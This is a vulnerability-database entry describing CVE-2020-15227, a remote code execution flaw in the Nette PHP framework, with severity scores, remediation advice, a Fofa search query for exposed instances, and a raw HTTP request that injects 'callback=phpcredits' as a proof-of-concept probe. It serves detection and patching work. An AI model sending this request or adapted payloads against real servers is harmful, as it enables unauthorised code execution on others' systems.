🔙 목록으로 돌아가기

CVE-2020-15227: Nette Framework - Remote Code Execution

TitleNette Framework - Remote Code Execution
Authorbecivells
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
RemediationApply the latest security patches provided by the Nette Framework to fix the deserialization vulnerability.
CVSS Score9.8
EPSS Score0.93793
CVE IDCVE-2020-15227
CWE IDCWE-94,CWE-74
Fofa Queryapp="nette-Framework"app="nette-framework"
Tags cve2020 cve nette rce vkev vuln

🔍 Vulnerability Description

Nette Framework versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, and 3.0.6 are vulnerable to a code injection attack via specially formed parameters being passed to a URL. Nette is a PHP/Composer MVC Framework.

🌐 HTTP Request

GET /nette.micro/?callback=phpcredits HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-15227.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-15227.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A